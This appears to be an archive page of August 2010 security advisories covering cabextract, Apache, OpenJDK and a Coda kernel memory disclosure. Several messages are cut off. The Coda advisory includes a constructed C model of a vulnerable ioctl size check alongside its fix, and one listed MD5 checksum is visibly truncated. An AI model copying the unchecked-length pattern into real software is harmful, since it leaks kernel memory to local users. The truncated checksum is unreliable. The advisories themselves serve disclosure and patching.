[ MDVSA-2010:154 ] cabextract

2010-08-16 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:154
 http://www.mandriva.com/security/
 ___

 Package : cabextract
 Date: August 16, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, 2010.1, Corporate 4.0,
   Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in cabextract:
 
 The MS-ZIP decompressor in cabextract before 1.3 allows remote
 attackers to cause a denial of service (infinite loop) via a malformed
 MSZIP archive in a .cab file during a test or extract action, related
 to the libmspack library (CVE-2010-2800).
 
 Integer signedness error in the Quantum decompressor in cabextract
 before 1.3, when archive test mode is used, allows user-assisted
 remote attackers to cause a denial of service (application crash)
 or possibly execute arbitrary code via a crafted Quantum archive in
 a .cab file, related to the libmspack library (CVE-2010-2801).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages provide cabextract 1.3, which is not vulnerable
 to these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2800
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2801
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 06bc69c8c987f02d6eab9748b6b7bec6  
2008.0/i586/cabextract-1.3-0.1mdv2008.0.i586.rpm 
 2d2ce7b41e7132924160bcd4efe976bf  
2008.0/SRPMS/cabextract-1.3-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 39aa73d801d3741d73fe1c52a783c59a  
2008.0/x86_64/cabextract-1.3-0.1mdv2008.0.x86_64.rpm 
 2d2ce7b41e7132924160bcd4efe976bf  
2008.0/SRPMS/cabextract-1.3-0.1mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 a73149d41c3d97452a17ac4b9776  
2009.0/i586/cabextract-1.3-0.1mdv2009.0.i586.rpm 
 29f5eccdfafc9dbbdc0dcab535b0931f  
2009.0/SRPMS/cabextract-1.3-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 d4fcbcd75ad356e57a499a46a45078d2  
2009.0/x86_64/cabextract-1.3-0.1mdv2009.0.x86_64.rpm 
 29f5eccdfafc9dbbdc0dcab535b0931f  
2009.0/SRPMS/cabextract-1.3-0.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 0d36cf43befc69e5b0814d354f7d57b4  
2009.1/i586/cabextract-1.3-0.1mdv2009.1.i586.rpm 
 d424f8d01aa76eed08e148119e191cb8  
2009.1/SRPMS/cabextract-1.3-0.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 78d02c4e90a7c177f3807012c84c2144  
2009.1/x86_64/cabextract-1.3-0.1mdv2009.1.x86_64.rpm 
 d424f8d01aa76eed08e148119e191cb8  
2009.1/SRPMS/cabextract-1.3-0.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 95ded9a24a1970bb2725cc07c0934ecf  
2010.0/i586/cabextract-1.3-0.1mdv2010.0.i586.rpm 
 eaf849e2ed85315a9d29b53375bb03e4  
2010.0/SRPMS/cabextract-1.3-0.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 f33745fe7621d534b80a562ba103f6d2  
2010.0/x86_64/cabextract-1.3-0.1mdv2010.0.x86_64.rpm 
 eaf849e2ed85315a9d29b53375bb03e4  
2010.0/SRPMS/cabextract-1.3-0.1mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 0746bb050b807defdcfaad0fae5833ed  
2010.1/i586/cabextract-1.3-0.1mdv2010.1.i586.rpm 
 585184499c728982c8079d518f0bcb89  
2010.1/SRPMS/cabextract-1.3-0.1mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 4f4b1099fe583edd9debeef0172532ec  
2010.1/x86_64/cabextract-1.3-0.1mdv2010.1.x86_64.rpm 
 585184499c728982c8079d518f0bcb89  
2010.1/SRPMS/cabextract-1.3-0.1mdv2010.1.src.rpm

 Corporate 4.0:
 a0d9ff34690f1b1e29d018ce65b1e4a4  
corporate/4.0/i586/cabextract-1.3-0.1.20060mlcs4.i586.rpm 
 26b233403d57c89c4908873c1ca0a02a  
corporate/4.0/SRPMS/cabextract-1.3-0.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 f7d1e38c772dde29a902b673ae3b13b0  
corporate/4.0/x86_64/cabextract-1.3-0.1.20060mlcs4.x86_64.rpm 
 26b233403d57c89c4908873c1ca0a02a  
corporate/4.0/SRPMS/cabextract-1.3-0.1.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 7765a24842b38edb510548b0a1011acf  
mes5/i586/cabextract-1.3-0.1mdvmes5.1.i586.rpm 
 eed072c21f91ad782545f11fe901affd  
mes5/SRPMS/cabextract-1.3-0.1mdvmes5.1.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 9c1bcac99cd1575a496f9899ac881c57  
mes5/x86_64/cabextract-1.3-0.1mdvmes5.1.x86_64.rpm 
 eed072c21f91ad782545f11fe901affd  
mes5/SRPMS/cabextract-1.3-0.1mdvmes5.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-ke

CVE-2010-3014: Coda Filesystem Kernel Memory Disclosure

2010-08-16 Thread VSR Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 VSR Security Advisory
   http://www.vsecurity.com/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Coda Filesystem Kernel Memory Disclosure
 Release Date: 2010-08-16
  Application: Coda kernel module for NetBSD and FreeBSD
 Versions: All known versions
 Severity: Medium
   Author: Dan Rosenberg < drosenberg (at) vsecurity (dot) com >
Vendor Status: Patch Released [2][3]
CVE Candidate: CVE-2010-3014
Reference: http://www.vsecurity.com/resources/advisory/20100816-1/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
-------------------
From [1]:

 "Coda is a distributed filesystem with its origin in AFS2.  It has many
 features that are very desirable for network filesystems.  Currently, Coda has
 several features not found elsewhere.

   1. disconnected operation for mobile computing
   2. is freely available under a liberal license
   3. high performance through client side persistent caching
   4. server replication
   5. security model for authentication, encryption and access control
   6. continued operation during partial network failures in server network
   7. network bandwidth adaptation
   8. good scalability
   9. well defined semantics of sharing, even in the presence of network failure"


Vulnerability Overview
----------------------
On July 19th, VSR identified a vulnerability in the Coda filesystem kernel
module, as implemented for FreeBSD and NetBSD.  By sending a specially crafted
ioctl request to a mounted Coda filesystem, an unprivileged local user could
read large portions of kernel heap memory, leading to the disclosure of
potentially sensitive information.


Product Background
------------------
Coda is implemented as a kernel filesystem module with userland components.
System calls involving file I/O are passed to the Coda kernel module, which in
turn passes the request to the userland Venus cache manager via a character
device.  Venus answers the request by checking its cache or requesting content
from the Coda server.  Coda implements most standard filesystem operations,
including providing an ioctl interface. 


Vulnerability Details
---------------------
Coda ioctls are passed through the Coda filesystem module before being sent to
Venus.  The arguments to a Coda ioctl are encapsulated in a PioctlData struct,
which in turn contains a ViceIoctl struct.  The ViceIoctl struct contains
"in_size" and "out_size" fields, dictating the expected size of the input and
output data corresponding to a particular ioctl request.  The "in_size" field
is validated to prevent memory corruption via copying an unexpected amount of
data from userspace into a kernel buffer.  

However, the "out_size" field was missing this validation.  When copying the
output data of an ioctl request back to userspace, the "out_size" field was
used to determine the amount of data to copy, without restricting it to a
maximum possible size.  By specifying a large value for this field, the
contents of the kernel heap beyond the data intended to be returned to the user
would be copied into a userland buffer.  An unprivileged user could exploit
this to read large portions of the kernel heap, potentially disclosing
sensitive information.
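The missing bounds check described above, shown as a constructed user-space model (added example code written for this page; it is not the Coda, FreeBSD or NetBSD source). The advisory names only the PioctlData and ViceIoctl structs and their in_size and out_size fields; the exact field layout, the VC_MAXDATASIZE limit and its value of 8192 bytes, and the function names are assumptions made here. `coda_validate_sizes_vulnerable` bounds only in_size, as the pre-fix kernel did; `coda_validate_sizes_fixed` bounds both directions before any copy. `reply_overread` measures how far a copy sized by an unchecked out_size would run past a reply buffer of VC_MAXDATASIZE bytes.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Constructed model of the Coda pioctl path described in the advisory.
 * The advisory names PioctlData, ViceIoctl, in_size and out_size; the field
 * layout and the VC_MAXDATASIZE limit (8192 here) are assumptions made for
 * this example, not the FreeBSD/NetBSD definitions.
 */
#define VC_MAXDATASIZE 8192

struct ViceIoctl {
    void *in;                 /* user buffer holding the request payload */
    void *out;                /* user buffer that receives the reply     */
    unsigned short in_size;   /* bytes to copy in  (user-controlled)     */
    unsigned short out_size;  /* bytes to copy out (user-controlled)     */
};

struct PioctlData {
    const char *path;         /* object inside the Coda mount the ioctl targets */
    int follow;               /* follow symlinks when resolving path?           */
    struct ViceIoctl vi;
};

/* Pre-fix behaviour: only the copyin direction is bounded. */
int coda_validate_sizes_vulnerable(const struct PioctlData *iap)
{
    if (iap->vi.in_size > VC_MAXDATASIZE)
        return EINVAL;
    return 0;
}

/* Post-fix behaviour: both directions are bounded before any copy happens. */
int coda_validate_sizes_fixed(const struct PioctlData *iap)
{
    if (iap->vi.in_size > VC_MAXDATASIZE || iap->vi.out_size > VC_MAXDATASIZE)
        return EINVAL;
    return 0;
}

/* Build a request carrying the given user-supplied sizes.  The size checks
 * never touch the data buffers, so they are left NULL in this model. */
static struct PioctlData make_pioctl(unsigned short in_size, unsigned short out_size)
{
    struct PioctlData iap;
    iap.path = "/coda/example";   /* constructed path */
    iap.follow = 1;
    iap.vi.in = NULL;
    iap.vi.out = NULL;
    iap.vi.in_size = in_size;
    iap.vi.out_size = out_size;
    return iap;
}

/* Run the selected validator on a request with these sizes: 0 or EINVAL. */
int validate_sizes(int use_fixed, unsigned short in_size, unsigned short out_size)
{
    struct PioctlData iap = make_pioctl(in_size, out_size);
    return use_fixed ? coda_validate_sizes_fixed(&iap)
                     : coda_validate_sizes_vulnerable(&iap);
}

/*
 * Model of the reply path: the kernel holds Venus's answer in a buffer of
 * VC_MAXDATASIZE bytes and copies out_size bytes of it to userspace.  Returns
 * -EINVAL when validation rejects the request; otherwise the number of bytes
 * the copy would read past the end of that buffer (0 means it stays in bounds).
 */
long reply_overread(int use_fixed, unsigned short in_size, unsigned short out_size)
{
    if (validate_sizes(use_fixed, in_size, out_size) != 0)
        return -EINVAL;
    if (out_size > VC_MAXDATASIZE)
        return (long)out_size - VC_MAXDATASIZE;  /* adjacent heap bytes exposed */
    return 0;
}

int main(void)
{
    /* A well-formed request, and one with the largest out_size a 16-bit
     * field can hold. */
    printf("benign  : vulnerable=%d fixed=%d\n",
           validate_sizes(0, 16, 64), validate_sizes(1, 16, 64));
    printf("oversize: vulnerable=%d fixed=%d (EINVAL=%d)\n",
           validate_sizes(0, 16, 0xffff), validate_sizes(1, 16, 0xffff), EINVAL);
    printf("over-read with old check: %ld bytes; with fix: %ld\n",
           reply_overread(0, 16, 0xffff), reply_overread(1, 16, 0xffff));
    return 0;
}
```

The benign request passes both validators. The oversize request passes the old check, and a copy sized by its out_size would read 57343 bytes beyond an 8192-byte reply buffer; the fixed check rejects it with EINVAL before anything is copied. The general lesson is that every user-controlled length used by a copy in either direction needs the same upper bound, not just the one on the copyin side.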


Versions Affected
-----------------
This vulnerability affects all known versions of the Coda filesystem module as
included in FreeBSD and NetBSD.  The Linux Coda module is not affected.


Vendor Response
---------------
The following timeline details FreeBSD's and NetBSD's response to the reported
issue:

2010-07-19  Vulnerability reported to FreeBSD and NetBSD
2010-07-20  Fix committed by NetBSD [2]
2010-07-21  Response from FreeBSD
2010-07-21  FreeBSD and NetBSD provided a draft advisory
2010-08-05  Fix committed by FreeBSD [3]
2010-08-16  Coordinated disclosure


Recommendation
--------------

Coda users should apply the updates committed by NetBSD [2] and FreeBSD [3].


Common Vulnerabilities and Exposures (CVE) Information
------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-3014 to this issue.  This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements
----------------
Thanks to the FreeBSD and NetBSD security teams for their prompt responses.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Coda File System
 http://www.coda.cs.cmu.edu

2. Coda module in NetBSD CVS
 http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/coda/?only_with_tag=MAIN

3. FreeBSD SVN revision 210997
 http://svn.freebsd.org/viewvc/base?view=revision&revision=210997

-=-=-

[USN-971-1] OpenJDK vulnerabilities

2010-08-16 Thread Kees Cook
===
Ubuntu Security Notice USN-971-1                          August 16, 2010
openjdk-6 vulnerabilities
CVE-2010-2548, CVE-2010-2783
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.04:
  icedtea6-plugin 6b18-1.8.1-0ubuntu1~9.04.1

Ubuntu 9.10:
  icedtea6-plugin 6b18-1.8.1-0ubuntu1~9.10.1

Ubuntu 10.04 LTS:
  icedtea6-plugin 6b18-1.8.1-0ubuntu1

After a standard system update you need to restart any Java applications
to make all the necessary changes.

Details follow:

It was discovered that the IcedTea plugin did not correctly check certain
accesses. If a user or automated system were tricked into running a
specially crafted Java applet, a remote attacker could read arbitrary
files with user privileges, leading to a loss of privacy. (CVE-2010-2548,
CVE-2010-2783)


Updated packages for Ubuntu 9.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b18-1.8.1-0ubuntu1~9.04.1.diff.gz
  Size/MD5:   130876 791d1430ba78b206019b9f928ce6f655

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b18-1.8.1-0ubuntu1~9.04.1.dsc
  Size/MD5: 2368 857c617e3aba466ebb3ede1dfb7ecadd

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b18-1.8.1.orig.tar.gz
  Size/MD5: 68315117 09ff345836841ae848e30da7ab089c87

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b18-1.8.1-0ubuntu1~9.04.1_all.deb
  Size/MD5: 19757840 8f729abfec60da0e603f96cb2cc3da75

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b18-1.8.1-0ubuntu1~9.04.1_all.deb
  Size/MD5:  5804748 8b55b8ccc2894ea6c9201d5d516c3f49

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b18-1.8.1-0ubuntu1~9.04.1_all.deb
  Size/MD5: 26750044 be4d3e01798ad02eacf9148aa97403d9

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:   371434 d9f6a654460bee98a1bcebdfa514caaf

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:84162 2387e32894e2ec9f6751168521d98794

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5: 91703024 cd725d0e84441863074a630dda99f12c

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:  2360718 791d3c5321dcac6e6b905627ba88c954

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5: 11020712 e98eba6a02114d9aa57ea151b15437e3

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5: 25454558 193bc4d11a6d637af779d545e56ca612

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:   269058 065b3f5b69a853f4e02f0d466bcddd3d

http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-jre-zero_6b18-1.8.1-0ubuntu1~9.04.1_amd64.deb
  Size/MD5:  2077082 777cc86837e896ab81b2319ed5ee8a16

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5:   344412 5698e4578958682c58edfd30833a4f2a

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5:78448 baf25cdcdf9dd797dbfe4319d5890300

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5: 156742426 3549e656235f5cafd64319d34e0e272a

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5:  2342312 98ee50c02d527484482c205b0d3349a9

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5: 11036544 0cf2e6e20693daa77abc0a450a4d8bf6

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5: 27136396 8a366351c0b2edecd7f81a31d60eb4e0

http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b18-1.8.1-0ubuntu1~9.04.1_i386.deb
  Size/MD5:   256316 588382d8931879923649109b21c431c6

http://security.ubuntu.com/ubuntu/pool/universe/

[ MDVSA-2010:153 ] apache

2010-08-16 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:153
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: August 16, 2010
 Affected: 2009.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in apache:
 
 The mod_cache and mod_dav modules in the Apache HTTP Server 2.2.x
 before 2.2.16 allow remote attackers to cause a denial of service
 (process crash) via a request that lacks a path (CVE-2010-1452).
 
 mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix,
 does not close the backend connection if a timeout occurs when reading
 a response from a persistent connection, which allows remote attackers
 to obtain a potentially sensitive response intended for a different
 client in opportunistic circumstances via a normal HTTP request.
 NOTE: this is the same issue as CVE-2010-2068, but for a different
 OS and set of affected versions (CVE-2010-2791).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1452
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2791
 http://httpd.apache.org/security/vulnerabilities_22.html
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 238de136ebd4ef12d69c2bc8a3e3d3be  
2009.0/i586/apache-base-2.2.9-12.10mdv2009.0.i586.rpm
 141124279c0755c0299d59587f0eafeb  
2009.0/i586/apache-devel-2.2.9-12.10mdv2009.0.i586.rpm
 05cf83c379680e3ed51340b42d084b54  
2009.0/i586/apache-htcacheclean-2.2.9-12.10mdv2009.0.i586.rpm
 9e1f554bb3705dedaddba825f1b56403  
2009.0/i586/apache-mod_authn_dbd-2.2.9-12.10mdv2009.0.i586.rpm
 9a3655c03604fcd04b4d1e0e34dedffc  
2009.0/i586/apache-mod_cache-2.2.9-12.10mdv2009.0.i586.rpm
 0a92ae5396ef3bc58481964474fbbb19  
2009.0/i586/apache-mod_dav-2.2.9-12.10mdv2009.0.i586.rpm
 63df221d5cf990cd347466419a8b0377  
2009.0/i586/apache-mod_dbd-2.2.9-12.10mdv2009.0.i586.rpm
 1b2dbf225749350a9bb7dcdf20b92227  
2009.0/i586/apache-mod_deflate-2.2.9-12.10mdv2009.0.i586.rpm
 5ecc8f17635dd7e7428292628daeda79  
2009.0/i586/apache-mod_disk_cache-2.2.9-12.10mdv2009.0.i586.rpm
 8fab3607fe02e1564939f8c20f0d207b  
2009.0/i586/apache-mod_file_cache-2.2.9-12.10mdv2009.0.i586.rpm
 88cd61a082b42899bda94777ab7e62aa  
2009.0/i586/apache-mod_ldap-2.2.9-12.10mdv2009.0.i586.rpm
 1ff181c8481cda668fcb129052ab094c  
2009.0/i586/apache-mod_mem_cache-2.2.9-12.10mdv2009.0.i586.rpm
 6eedc6c5d7727f408882a07d0408bbdd  
2009.0/i586/apache-mod_proxy-2.2.9-12.10mdv2009.0.i586.rpm
 ba21753018cb8fb4aa4750e8fe77e022  
2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.10mdv2009.0.i586.rpm
 2a90910cff8efc4dd4c61db469548bf5  
2009.0/i586/apache-mod_ssl-2.2.9-12.10mdv2009.0.i586.rpm
 35e3bca53a5880a07b24ad72f6dd6d07  
2009.0/i586/apache-modules-2.2.9-12.10mdv2009.0.i586.rpm
 62e5846e1811ba312d6bb8f049493788  
2009.0/i586/apache-mod_userdir-2.2.9-12.10mdv2009.0.i586.rpm
 0f15da6722a641d7d5e5b911e8c0cece  
2009.0/i586/apache-mpm-event-2.2.9-12.10mdv2009.0.i586.rpm
 9b9f2d505afcc686c7d7fd1fb80615f7  
2009.0/i586/apache-mpm-itk-2.2.9-12.10mdv2009.0.i586.rpm
 d839ec4ccd71e89115f9f62cd6ceee36  
2009.0/i586/apache-mpm-peruser-2.2.9-12.10mdv2009.0.i586.rpm
 e4ae2a88b622053fe3b319343fadaf1e  
2009.0/i586/apache-mpm-prefork-2.2.9-12.10mdv2009.0.i586.rpm
 797172063095f4f48199e0f5c6df34df  
2009.0/i586/apache-mpm-worker-2.2.9-12.10mdv2009.0.i586.rpm
 56a686181dec3713a922e2beb1b74515  
2009.0/i586/apache-source-2.2.9-12.10mdv2009.0.i586.rpm 
 ffc80b53691b9200454d986e66728aa2  
2009.0/SRPMS/apache-2.2.9-12.10mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 c578a6e9a29e81df145a388e8696e8f0  
2009.0/x86_64/apache-base-2.2.9-12.10mdv2009.0.x86_64.rpm
 168df22318ae9ea5be0f265b9aaa486a  
2009.0/x86_64/apache-devel-2.2.9-12.10mdv2009.0.x86_64.rpm
 3fd73c32becdc0c7ea67283c3a056e52  
2009.0/x86_64/apache-htcacheclean-2.2.9-12.10mdv2009.0.x86_64.rpm
 875d0e01dd140f65da24a14eb57ae484  
2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.10mdv2009.0.x86_64.rpm
 3247dcd354558d0fe035feda4416c8a0  
2009.0/x86_64/apache-mod_cache-2.2.9-12.10mdv2009.0.x86_64.rpm
 101c210907cd0e5d289081d80f83892e  
2009.0/x86_64/apache-mod_dav-2.2.9-12.10mdv2009.0.x86_64.rpm
 10b7a5d979b99bcbf38fdbe0e036a1cf  
2009.0/x86_64/apache-mod_dbd-2.2.9-12.10mdv2009.0.x86_64.rpm
 82c0a9a58e60d6018447052ad22b4507  
2009.0/x86_64/apache-mod_deflate-2.2.9-12.10mdv2009.0.x86_64.rpm
 fae88ae076de0bc2528f6b01f96c0608  

[ MDVSA-2010:152 ] apache

2010-08-16 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:152
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: August 16, 2010
 Affected: 2008.0, 2009.1, 2010.0, 2010.1, Corporate 4.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in apache:
 
 The mod_cache and mod_dav modules in the Apache HTTP Server 2.2.x
 before 2.2.16 allow remote attackers to cause a denial of service
 (process crash) via a request that lacks a path (CVE-2010-1452).
 
 Packages for 2008.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1452
 http://httpd.apache.org/security/vulnerabilities_22.html
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 06e857488c2b40c2a0aaf7004726a502  
2008.0/i586/apache-base-2.2.6-8.6mdv2008.0.i586.rpm
 2694040802b1329f0adac51bd7640136  
2008.0/i586/apache-devel-2.2.6-8.6mdv2008.0.i586.rpm
 6c4a5fb028605baa3459e03085b37d5e  
2008.0/i586/apache-htcacheclean-2.2.6-8.6mdv2008.0.i586.rpm
 e8e0cff4447b3f7b264f660fbe379449  
2008.0/i586/apache-mod_authn_dbd-2.2.6-8.6mdv2008.0.i586.rpm
 582f3ecc2eb97e6eef6a3bdae1ff5498  
2008.0/i586/apache-mod_cache-2.2.6-8.6mdv2008.0.i586.rpm
 2a080305b7e8b11bdd97b61f79c03d6d  
2008.0/i586/apache-mod_dav-2.2.6-8.6mdv2008.0.i586.rpm
 902b29ea25196ddd0c718ba5ff8fb5bc  
2008.0/i586/apache-mod_dbd-2.2.6-8.6mdv2008.0.i586.rpm
 88820b4987fb8dbe91983a57448aefa4  
2008.0/i586/apache-mod_deflate-2.2.6-8.6mdv2008.0.i586.rpm
 caf10ec66d8a7cc0abc3e41d0862da38  
2008.0/i586/apache-mod_disk_cache-2.2.6-8.6mdv2008.0.i586.rpm
 0c99ec09dc44adcd28816e6ea1362cde  
2008.0/i586/apache-mod_file_cache-2.2.6-8.6mdv2008.0.i586.rpm
 478b82672ede1c503fc865206d21a100  
2008.0/i586/apache-mod_ldap-2.2.6-8.6mdv2008.0.i586.rpm
 fe63f0ff63ed611e682d2f7c40e017e9  
2008.0/i586/apache-mod_mem_cache-2.2.6-8.6mdv2008.0.i586.rpm
 7feee63e323c6a3b5183c42093b31e0d  
2008.0/i586/apache-mod_proxy-2.2.6-8.6mdv2008.0.i586.rpm
 a92cb47580b48464e12ce9a22d083ed3  
2008.0/i586/apache-mod_proxy_ajp-2.2.6-8.6mdv2008.0.i586.rpm
 40911443f472c5af1ab59b1fff907872  
2008.0/i586/apache-mod_ssl-2.2.6-8.6mdv2008.0.i586.rpm
 665e6157da7ecc8a553c358627014137  
2008.0/i586/apache-modules-2.2.6-8.6mdv2008.0.i586.rpm
 23842ef27bc0cb4c2928ea30c461d7bc  
2008.0/i586/apache-mod_userdir-2.2.6-8.6mdv2008.0.i586.rpm
 0736f77fe06f01e7d22b921902ed73d2  
2008.0/i586/apache-mpm-event-2.2.6-8.6mdv2008.0.i586.rpm
 ab1654f679b3f5a7032922dd9f6c8025  
2008.0/i586/apache-mpm-itk-2.2.6-8.6mdv2008.0.i586.rpm
 eb834fb78041f217d30c532bf95c0143  
2008.0/i586/apache-mpm-prefork-2.2.6-8.6mdv2008.0.i586.rpm
 add5fb58f78e7ce6689cd58c16ffdffb  
2008.0/i586/apache-mpm-worker-2.2.6-8.6mdv2008.0.i586.rpm
 2bd4caaf1128cb0fc94c4c44f2c56453  
2008.0/i586/apache-source-2.2.6-8.6mdv2008.0.i586.rpm 
 57c08b6909e494350019980e757991f5  
2008.0/SRPMS/apache-2.2.6-8.6mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 2a34fe7f0be72ccf8c9b734ca63be6e5  
2008.0/x86_64/apache-base-2.2.6-8.6mdv2008.0.x86_64.rpm
 3335fb591a6401a1b310d6bd8120660e  
2008.0/x86_64/apache-devel-2.2.6-8.6mdv2008.0.x86_64.rpm
 de353f53148a32682f8a3ffb51b76ed5  
2008.0/x86_64/apache-htcacheclean-2.2.6-8.6mdv2008.0.x86_64.rpm
 bfc150afb6ccbe9eab57849a94419e5f  
2008.0/x86_64/apache-mod_authn_dbd-2.2.6-8.6mdv2008.0.x86_64.rpm
 a0481e9c6a2bbd44247782bc90e2b915  
2008.0/x86_64/apache-mod_cache-2.2.6-8.6mdv2008.0.x86_64.rpm
 06242bb4f8bdea11cf9ae424c5515231  
2008.0/x86_64/apache-mod_dav-2.2.6-8.6mdv2008.0.x86_64.rpm
 302f9ecc1dfb77352e296c05190afe24  
2008.0/x86_64/apache-mod_dbd-2.2.6-8.6mdv2008.0.x86_64.rpm
 2ab511c8144aa3dd8a1ad3a2feb82458  
2008.0/x86_64/apache-mod_deflate-2.2.6-8.6mdv2008.0.x86_64.rpm
 83b8eb7acd50b8a6d05b8519f7c6cb4b  
2008.0/x86_64/apache-mod_disk_cache-2.2.6-8.6mdv2008.0.x86_64.rpm
 427b3929d5e10ffc6064ca2cc38ccd88  
2008.0/x86_64/apache-mod_file_cache-2.2.6-8.6mdv2008.0.x86_64.rpm
